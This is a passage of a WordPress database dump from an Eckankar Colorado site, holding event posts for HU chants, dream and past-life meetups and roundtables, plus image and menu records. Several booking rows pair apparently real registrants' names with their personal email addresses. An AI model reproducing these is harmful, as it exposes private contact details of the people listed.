11:35:15','2023-09-18 17:35:15','',0,'https://eckankar-colorado.org/?post_type=bg_block&#038;p=269010',0,'bg_block','',0),(267812,2,'2023-02-02 17:07:00','2023-02-03 00:07:00','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<div class=\"break-words\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You are warmly invited to experience HU, a divine sound that courses through all of life and through every atom of your body. HU is an ancient name for God, a sacred sound, and a carrier of love between Soul and God. It has been sung for thousands of years, and in many places, for spiritual unfoldment. It can uplift people of any religion, culture, or walk of life.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Singing HU acts as a tuning fork, aligning Soul to higher states of love, creativity, healing, and awareness. When sung or chanted with an open heart, it opens the lines of communication to the most sacred part of yourself.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">In this IN-PERSON event in Durango, you will have the opportunity to experience some of the many benefits of singing HU:</span></p>\r\n<ul class=\"\">\r\n	<li class=\"mb-4\"><span style=\"font-size: 14pt;\">Inner peace and calm</span></li>\r\n	<li class=\"mb-4\"><span style=\"font-size: 14pt;\">Divine love</span></li>\r\n	<li class=\"mb-4\"><span style=\"font-size: 14pt;\">Expanded awareness</span></li>\r\n	<li class=\"mb-4\"><span style=\"font-size: 14pt;\">Spiritual self-discovery and growth</span></li>\r\n	<li class=\"mb-4\"><span style=\"font-size: 14pt;\">Healing of the heart</span></li>\r\n</ul>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">The event will include singing HU for 15 to 20 minutes, a few minutes of quiet contemplation, and a discussion group, where you can participate in spiritual conversation with others of like heart.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This event is sponsored by Eckankar and is free of charge. Find out more about HU at <a class=\"text-viridian\" href=\"https://www.eckankar.org/experience/hu-the-sound-of-soul/\" target=\"_blank\" rel=\"nofollow noopener ugc\">What is HU? | HU is the Sound of Soul | ECKANKAR</a>.</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"bg-white rounded-lg\">\r\n<div class=\"p-5\">\r\n<div class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures</strong></span></div>\r\n<div class=\"\">\r\n<div><span class=\"\" style=\"font-size: 12pt;\"><strong>**</strong><em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">&nbsp;</p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/spiritual-experiences-group-of-durango/events/290781831/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Explore a Daily Practice for More Joy, Wisdom and Peace<br>Meetup - In Person','','publish','closed','closed','','explore-a-daily-practice-for-more-joy-wisdom-and-peacemeetup-in-person','','','2023-02-02 17:07:00','2023-02-03 00:07:00','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=267812',0,'mec-events','',0),(267813,2,'2023-02-02 17:14:53','2023-02-03 00:14:53','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<div class=\"break-words\">\r\n<p class=\"mb-4\"><span style=\"font-size: 18pt;\"><strong>Potential, Possibilities, Talent, Prospects, Yet-to-be-realized Goals.</strong></span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">These ideas can also include our spiritual life. There is a strong connection between how we view our spiritual potential and how our dreams and goals manifest.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">There are many tools available that can help us realize our dreams.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Join the Spiritual Experiences Group of Pagosa Springs for a whole-hearted discussion on how we can boost our spiritual potential. Our topics will include tools that can enhance your life journey and new ways to develop your talents and potential. We will explore possible ways to make your dreams a reality – all from a spiritual perspective.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">The discussion is free and open to people of all faiths and beliefs - friends, and family. It will be held at the Pagosa Lakes Clubhouse, 230-A Port Ave, Pagosa Springs, on Sunday, February 12th, and begins at 1:00P.</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"bg-white rounded-lg\">\r\n<div class=\"p-5\">\r\n<div class=\"\"><span class=\"\" style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures</strong></span></div>\r\n<div class=\"\">\r\n<div><span class=\"\" style=\"font-size: 12pt;\"><strong>**</strong><em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">&nbsp;</p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/pagosa-springs-spiritual-experiences-group/events/291232472/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Spiritual Tools to Unlock Your Dreams, Talents, and Spiritual Potential - Meetup - In Person','','publish','closed','closed','','spiritual-tools-to-unlock-your-dreams-talents-and-spiritual-potentialmeetup-in-person','','','2023-02-02 17:17:22','2023-02-03 00:17:22','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=267813',0,'mec-events','',0),(267814,2,'2023-02-02 17:13:32','2023-02-03 00:13:32','','hands-light-1','','inherit','closed','closed','','hands-light-1','','','2023-02-02 17:13:32','2023-02-03 00:13:32','',267813,'https://eckankar-colorado.org/wp-content/uploads/2023/02/hands-light-1.jpg',0,'attachment','image/jpeg',0),(267823,2,'2023-02-03 11:39:47','2023-02-03 18:39:47','','soul-adv-banner-1','','inherit','closed','closed','','soul-adv-banner-1','','','2023-02-03 11:39:47','2023-02-03 18:39:47','',0,'https://eckankar-colorado.org/wp-content/uploads/2023/02/soul-adv-banner-1.png',0,'attachment','image/png',0),(269092,2,'2023-09-18 10:55:01','2023-09-18 16:55:01','','web-promo-bk-6','','inherit','closed','closed','','web-promo-bk-6','','','2023-09-18 10:55:01','2023-09-18 16:55:01','',68102,'https://eckankar-colorado.org/wp-content/uploads/2023/09/web-promo-bk-6.jpg',0,'attachment','image/jpeg',0),(267828,2,'2023-02-03 11:51:01','2023-02-03 18:51:01','','soul-adv-banner-2','','inherit','closed','closed','','soul-adv-banner-2','','','2023-02-03 11:51:01','2023-02-03 18:51:01','',0,'https://eckankar-colorado.org/wp-content/uploads/2023/02/soul-adv-banner-2.png',0,'attachment','image/png',0),(267852,2,'2023-02-03 14:35:35','2023-02-03 21:35:35','','esc-sun-lensflare-2','','inherit','closed','closed','','esc-sun-lensflare-2','','','2023-02-03 14:35:35','2023-02-03 21:35:35','',0,'https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg',0,'attachment','image/jpeg',0),(268172,2,'2023-03-07 20:58:25','2023-03-08 03:58:25','','dreaming-3','','inherit','closed','closed','','dreaming-3','','','2023-03-07 20:58:25','2023-03-08 03:58:25','',268171,'https://eckankar-colorado.org/wp-content/uploads/2023/03/dreaming-3.jpg',0,'attachment','image/jpeg',0),(268170,1000072,'2023-03-12 10:30:00','2023-03-12 16:30:00','','Sue Smith - suesmith332@gmail.com','','publish','closed','closed','','sue-smith-suesmith332gmail-com','','','2023-03-12 10:30:00','2023-03-12 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=268170',0,'mec-books','',0),(268171,2,'2023-03-07 20:45:40','2023-03-08 03:45:40','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<ul class=\"pl-5 list-disc mb-4\">\r\n	<li><span style=\"font-size: 14pt;\">Would you like to know how remembering your dreams can help you?</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Are you interested in tools to remember and interpret your dreams?</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Would you like to understand how dreams can enhance your spiritual growth?</span></li>\r\n</ul>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">If you answered yes to any of these questions, then this Meetup is for you. We will discuss ways to remember and interpret your dreams and try a couple techniques to help you understand what is happening in your own inner worlds. Our goal is that each person will see the value of exploring dream worlds to gain spiritual insights.<br>\r\n</span><span style=\"font-size: 14pt;\">&nbsp;</span></p>\r\n<blockquote class=\"bg-blockquote border\" style=\"margin-top: -25px; margin-left: 20px; border-style: solid; border-width: 0px 0px 0px 4px; border-color: #23507d;\">\r\n<p><span style=\"color: #666666; font-size: 14pt;\">Harold Klemp says in his book,<em> ECK Wisdom on Dreams</em>, p.1,</span></p>\r\n<p><span style=\"color: #666666; font-size: 14pt;\">“Why do we dream? Why is it important to dream? Because dreaming comes from the creative imagination, which is God’s gift to you and me. It is the nature of immortal Soul to dream. This is why your dreams, both in everyday life and while asleep are so important.\"</span></p>\r\n</blockquote>\r\n<span class=\"\" style=\"font-size: 14pt;\">This event, sponsored by Eckankar as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span><br>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/segofdenver/events/292073208/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','\'Gaining Insights through Spiritual Dream Exploration\'<br>Online Discussion','','publish','closed','closed','','gaining-insights-through-spiritual-dream-explorationonline-discussion','','','2023-03-07 21:06:20','2023-03-08 04:06:20','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268171',0,'mec-events','',0),(267870,0,'2023-02-04 07:36:11','2023-02-04 14:36:11','','','','publish','closed','closed','','267870','','','2023-02-04 07:36:11','2023-02-04 14:36:11','',0,'https://eckankar-colorado.org/nf_sub/267870/',0,'nf_sub','',0),(267871,0,'2023-02-04 10:36:56','2023-02-04 17:36:56','','','','publish','closed','closed','','267871','','','2023-02-04 10:36:56','2023-02-04 17:36:56','',0,'https://eckankar-colorado.org/nf_sub/267871/',0,'nf_sub','',0),(267872,2,'2023-02-05 09:44:52','2023-02-05 16:44:52','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 20pt;\">Ready For Some Spiritual Conversation?</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Roundtables are forums that dive deep into spiritual topics. You’ll be able to share your spiritual experiences, perspectives, or questions. If you prefer to listen and learn, that’s cool too!</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">People of all faiths and backgrounds are welcome. There’s no need to register—just drop in.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Explore this spiritual topic with other participants in a lively discussion led by an ECK Spiritual Aide (ESA), a specially trained member of the ECK clergy. Each roundtable&nbsp;consists of up to 12 participants.&nbsp;&nbsp;<br>\r\n</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Preceded by a HU Chant from 9:45 - 10:15 a.m.</span></p>\r\n<p class=\"\">&nbsp;</p>\r\n<p class=\"\">&nbsp;</p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> We are following the current Jefferson County guidelines for all in person events at the Colorado ECK Temple in Lakewood, CO. Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health. </span></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','\'The Presence of God\'s Love\'<br>Roundtable Discussion - In Person','','publish','closed','closed','','the-presence-of-gods-loveroundtable-discussion-in-person','','','2023-02-05 10:04:49','2023-02-05 17:04:49','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=267872',0,'mec-events','',0),(267895,2,'2023-08-27 11:24:36','0000-00-00 00:00:00','<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 18pt;\">- This Event Is Available To High Initiates in Eckankar -</span><br>\n</strong></span></p>\n<p><span style=\"font-size: 14pt;\">An High Initiate Book discussion meeting is an opportunity for ECK High Initiates (5th Initiation and above) to gather together for spiritual discussion and fellowship</span>.</p>\n</div>\n</div>\n</div>\n</div>','H.I. BOOK DISCUSSION ONLINE TEMPLATE | Title Goes Here','','draft','closed','closed','','','','','2023-08-27 11:24:36','2023-08-27 17:24:36','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=267895',0,'mec-events','',0),(267897,2,'2023-10-20 09:43:11','2023-02-07 04:25:19','','About Eckankar','','publish','closed','closed','','about-eckankar','','','2023-10-20 09:43:11','2023-10-20 15:43:11','',0,'https://eckankar-colorado.org/?p=267897',8,'nav_menu_item','',0),(268185,1000044,'2023-03-12 10:30:00','2023-03-12 16:30:00','','Colleyna Danler - colleynadanler@hotmail.com','','publish','closed','closed','','colleyna-danler-colleynadanlerhotmail-com-5','','','2023-03-12 10:30:00','2023-03-12 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=268185',0,'mec-books','',0),(268186,1000048,'2023-03-12 10:30:00','2023-03-12 16:30:00','','Rhonda Miller - rhoann9@gmail.com','','publish','closed','closed','','rhonda-miller-rhoann9gmail-com-2','','','2023-03-12 10:30:00','2023-03-12 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=268186',0,'mec-books','',0),(268187,1000061,'2023-03-12 10:30:00','2023-03-12 16:30:00','','Chukwuebuka - ocekenedili@yahoo.com','','publish','closed','closed','','chukwuebuka-ocekenediliyahoo-com-3','','','2023-03-12 10:30:00','2023-03-12 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=268187',0,'mec-books','',0),(268188,1000074,'2023-03-12 10:30:00','2023-03-12 16:30:00','','Jessica - lifedreamssolutions@gmail.com','','publish','closed','closed','','jessica-lifedreamssolutionsgmail-com','','','2023-03-12 10:30:00','2023-03-12 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=268188',0,'mec-books','',0),(268189,1000075,'2023-03-12 10:30:00','2023-03-12 16:30:00','','Darlene  Montgomery  - lifedreamsvision@gmail.com','','publish','closed','closed','','darlene-montgomery-lifedreamsvisiongmail-com','','','2023-03-12 10:30:00','2023-03-12 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=268189',0,'mec-books','',0),(268190,1000076,'2023-03-12 10:30:00','2023-03-12 16:30:00','','Shannon Everett - shannon.everett2018@outlook.com','','publish','closed','closed','','shannon-everett-shannon-everett2018outlook-com','','','2023-03-12 10:30:00','2023-03-12 16:30:00','',0,'https://eckankar-colorado.org/mec-books/shannon-everett-shannon-everett2018outlook-com/',0,'mec-books','',0),(268191,1000071,'2023-03-12 10:30:00','2023-03-12 16:30:00','','Elaine Dahlgren - elainedahl@yahoo.com','','publish','closed','closed','','elaine-dahlgren-elainedahlyahoo-com-2','','','2023-03-12 10:30:00','2023-03-12 16:30:00','',0,'https://eckankar-colorado.org/mec-books/elaine-dahlgren-elainedahlyahoo-com-2/',0,'mec-books','',0),(268184,1000020,'2023-03-12 10:30:00','2023-03-12 16:30:00','','Joanne - joanna3064@gmail.com','','publish','closed','closed','','joanne-joanna3064gmail-com','','','2023-03-12 10:30:00','2023-03-12 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=268184',0,'mec-books','',0),(267918,15,'2023-02-08 07:48:18','2023-02-08 14:48:18','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<ul class=\"pl-5 list-disc mb-4\">\r\n	<li><span style=\"font-size: 14pt;\">Have you ever wondered if you have had past lives or feel like you have known someone for a long time even though you just met?</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Can you recall your dreams or are they so jumbled that you feel you cannot understand them at all? Are dreams real experiences?</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Have you ever experienced an out-of-body experience or sensed that there is more to life than what we see?</span></li>\r\n</ul>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">If you answered yes to any of these questions, then this Meetup is for you. We can learn to recall and interpret memories of past lives, understand the spiritual messages in our dreams, and explore expanding our inner awareness though Soul Travel.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Join us for a free interactive discussion on Past Lives, Dreams and Soul Travel. We encourage you to come and share your experiences, hear from others and learn techniques to tap into your higher self. We’ll have an opportunity to try a “spiritual exercise” as a group too.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This event is sponsored by Eckankar, the Path of Spiritual Freedom as a community service.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">There is never a charge for this Meetup.</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"bg-white rounded-lg\">\r\n<div class=\"p-5\">\r\n<div class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures</strong></span></div>\r\n<div class=\"\">\r\n<div><span class=\"\" style=\"font-size: 12pt;\"><strong>**</strong><em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">&nbsp;</p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/spiritual-experiences-of-loveland/events/291458597/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Past Lives Dreams and Soul Travel Discussion<br>Meetup - In Person','','publish','closed','closed','','past-lives-dreams-and-soul-travel-discussionmeetup-in-person','','','2023-02-08 07:48:18','2023-02-08 14:48:18','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=267918',0,'mec-events','',0),(267919,15,'2023-02-08 07:57:38','2023-02-08 14:57:38','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">The dream worlds are real. When we sleep, Soul (that\'s you!) is free to travel in the spiritual worlds and gain all kinds of experience that can help you in your day-to-day life. </span></p>\r\n<blockquote class=\"\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Harold Klemp says in his book,&nbsp;<em>Past Lives Dreams and Soul Travel</em>, p. 88, \"Dreams are a golden key to understanding the most secret part of ourselves.”</span></p>\r\n</blockquote>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Would you like help remembering your dreams?</span><br>\r\n<span style=\"font-size: 14pt;\">Are you interested in tools to interpret your dreams?</span><br>\r\n<span style=\"font-size: 14pt;\">Would you like to understand the inner, subtle side of yourself better?</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">If you answered yes to any of these questions, then this Meetup is for you. We will discuss ways to remember and interpret your dreams and try a couple techniques to help you understand what is happening in your own inner worlds. Our goal is that each person will gain a deeper understanding of the dream worlds from a spiritual perspective.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This event, sponsored by Eckankar as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span></p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/segofdenver/events/291473280/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','\'A Spiritual View of Dreams\'<br>Online Discussion','','publish','closed','closed','','a-spiritual-view-of-dreamsmeetup-online','','','2023-03-07 21:16:59','2023-03-08 04:16:59','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=267919',0,'mec-events','',0),(268087,0,'2023-02-24 18:09:47','2023-02-25 01:09:47','','','','publish','closed','closed','','268087','','','2023-02-24 18:09:47','2023-02-25 01:09:47','',0,'https://eckankar-colorado.org/nf_sub/268087/',0,'nf_sub','',0),(267921,2,'2023-02-08 14:22:22','2023-02-08 21:22:22','','teacher-bg','','inherit','closed','closed','','teacher-bg','','','2023-02-08 14:22:22','2023-02-08 21:22:22','',0,'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg',0,'attachment','image/jpeg',0),(267933,2,'2023-02-08 15:10:54','2023-02-08 22:10:54','','sri-harold-shaking-hands-transp-2','','inherit','closed','closed','','sri-harold-shaking-hands-transp-2','','','2023-02-08 15:10:54','2023-02-08 22:10:54','',7160,'https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png',0,'attachment','image/png',0),(267942,1000012,'2023-02-12 10:30:00','2023-02-12 17:30:00','','Lynn gardner - lynnie626@gmail.com','','publish','closed','closed','','lynn-gardner-lynnie626gmail-com-4','','','2023-02-12 10:30:00','2023-02-12 17:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=267942',0,'mec-books','',0),(268115,0,'2023-02-27 16:13:32','2023-02-27 23:13:32','','','','publish','closed','closed','','268115','','','2023-02-27 16:13:32','2023-02-27 23:13:32','',0,'https://eckankar-colorado.org/nf_sub/268115/',0,'nf_sub','',0),(268038,15,'2023-02-20 08:23:48','2023-02-20 15:23:48','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<ul class=\"pl-5 list-disc mb-4\">\r\n	<li><span style=\"font-size: 14pt;\">Have you ever wondered if you have had past lives or feel like you have known someone for a long time even though you just met?</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Can you recall your dreams or are they so jumbled that you feel you cannot understand them at all? Are dreams real experiences?</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Have you ever experienced an out-of-body experience or sensed that there is more to life than what we see?</span></li>\r\n</ul>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">If you answered yes to any of these questions, then this Meetup is for you. We can learn to recall and interpret memories of past lives, understand the spiritual messages in our dreams, and explore expanding our inner awareness though Soul Travel.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Join us for a free interactive discussion on Past Lives, Dreams and Soul Travel. We encourage you to come and share your experiences, hear from others and learn techniques to tap into your higher self. We’ll have an opportunity to try a “spiritual exercise” as a group too.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This event is sponsored by Eckankar, the Path of Spiritual Freedom as a community service.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">There is never a charge for this Meetup.</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"bg-white rounded-lg\">\r\n<div class=\"p-5\">\r\n<div class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures</strong></span></div>\r\n<div class=\"\">\r\n<div><span class=\"\" style=\"font-size: 12pt;\"><strong>**</strong><em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">&nbsp;</p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/spiritual-experiences-of-loveland/events/291719068/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Past Lives Dreams and Soul Travel Discussion<br>Meetup - In Person','','publish','closed','closed','','past-lives-dreams-and-soul-travel-discussionmeetup-in-person-2','','','2023-02-20 08:23:48','2023-02-20 15:23:48','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268038',0,'mec-events','',0),(268196,15,'2023-03-15 08:04:40','2023-03-15 14:04:40','','PersonHill','','inherit','closed','closed','','personhill','','','2023-03-15 08:04:40','2023-03-15 14:04:40','',268195,'https://eckankar-colorado.org/wp-content/uploads/2023/03/PersonHill.webp',0,'attachment','image/webp',0),(269161,15,'2023-10-03 17:33:53','2023-10-03 23:33:53','','MountainSide','','inherit','closed','closed','','mountainside','','','2023-10-03 17:33:53','2023-10-03 23:33:53','',269160,'https://eckankar-colorado.org/wp-content/uploads/2023/10/MountainSide.webp',0,'attachment','image/webp',0),(268198,15,'2023-03-15 08:11:58','2023-03-15 14:11:58','','Waterfall','','inherit','closed','closed','','waterfall','','','2023-03-15 08:11:58','2023-03-15 14:11:58','',0,'https://eckankar-colorado.org/wp-content/uploads/2023/03/Waterfall.webp',0,'attachment','image/webp',0),(267952,0,'2023-02-10 23:12:21','2023-02-11 06:12:21','','','','publish','closed','closed','','267952','','','2023-02-10 23:12:21','2023-02-11 06:12:21','',0,'https://eckankar-colorado.org/nf_sub/267952/',0,'nf_sub','',0),(267953,1000068,'2023-02-12 10:30:00','2023-02-12 17:30:00','','Justyna Furmanek - j_furmanek@msn.com','','publish','closed','closed','','justyna-furmanek-j_furmanekmsn-com','','','2023-02-12 10:30:00','2023-02-12 17:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=267953',0,'mec-books','',0),(267954,1000030,'2023-02-12 10:30:00','2023-02-12 17:30:00','','Marilyn Millar - marilynmillarhu@gmail.com','','publish','closed','closed','','marilyn-millar-marilynmillarhugmail-com-2','','','2023-02-12 10:30:00','2023-02-12 17:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=267954',0,'mec-books','',0),(267955,1000047,'2023-02-12 10:30:00','2023-02-12 17:30:00','','Beth  - beth1848@yahoo.com','','publish','closed','closed','','beth-beth1848yahoo-com-2','','','2023-02-12 10:30:00','2023-02-12 17:30:00','',0,'https://eckankar-colorado.org/mec-books/beth-beth1848yahoo-com-2/',0,'mec-books','',0),(267956,1000007,'2023-02-12 10:30:00','2023-02-12 17:30:00','','William Massengale  - billybobak@yahoo.com','','publish','closed','closed','','william-massengale-billybobakyahoo-com','','','2023-02-12 10:30:00','2023-02-12 17:30:00','',0,'https://eckankar-colorado.org/mec-books/william-massengale-billybobakyahoo-com/',0,'mec-books','',0),(268193,15,'2023-03-15 07:57:38','2023-03-15 13:57:38','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><strong>Bringing spirituality into our daily lives isn\'t hard. In fact, there are many simple, meaningful practices we can adopt to bring more joy, love, wisdom, and freedom into our lives.</strong></span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Join other spiritual adventurers at the Hilton Garden Inn as we dive deep into this topic. We\'ll share stories and insights, give tips and techniques, ask questions and offer suggestions.</span></p>\r\n<blockquote class=\"\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">\"Soul\'s desire is conscious evolution. Life always takes us forward if we will go.\" —Harold Klemp, <em>The Spiritual life</em>, p. 12</span></p>\r\n</blockquote>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Look for us in the hotel lobby with the Meetup sign. We are often seated in the back of the room.</span></p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/spiritual-experiences-group-of-longmont/events/292179224/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Everyday Spirituality<br>In Person Discussion','','publish','closed','closed','','everyday-spiritualityin-person-discussion','','','2023-03-15 07:57:38','2023-03-15 13:57:38','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268193',0,'mec-events','',0),(268194,15,'2023-03-15 07:55:35','2023-03-15 13:55:35','','Bench','','inherit','closed','closed','','bench','','','2023-03-15 07:55:35','2023-03-15 13:55:35','',268193,'https://eckankar-colorado.org/wp-content/uploads/2023/03/Bench.webp',0,'attachment','image/webp',0),(268195,15,'2023-03-15 08:06:24','2023-03-15 14:06:24','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"mb-4\"><span style=\"font-size: 16pt;\"><em><strong>Tune into the Sound current with HU.</strong></em></span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You are warmly invited to experience HU, a divine sound that courses through all of life and through every atom of your body. HU is an ancient name for God, a sacred sound and a carrier of love between Soul and God. It has been sung for thousands of years, and in many places, for spiritual unfoldment. It can uplift people of any religion, culture, or walk of life.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Singing HU acts as a tuning 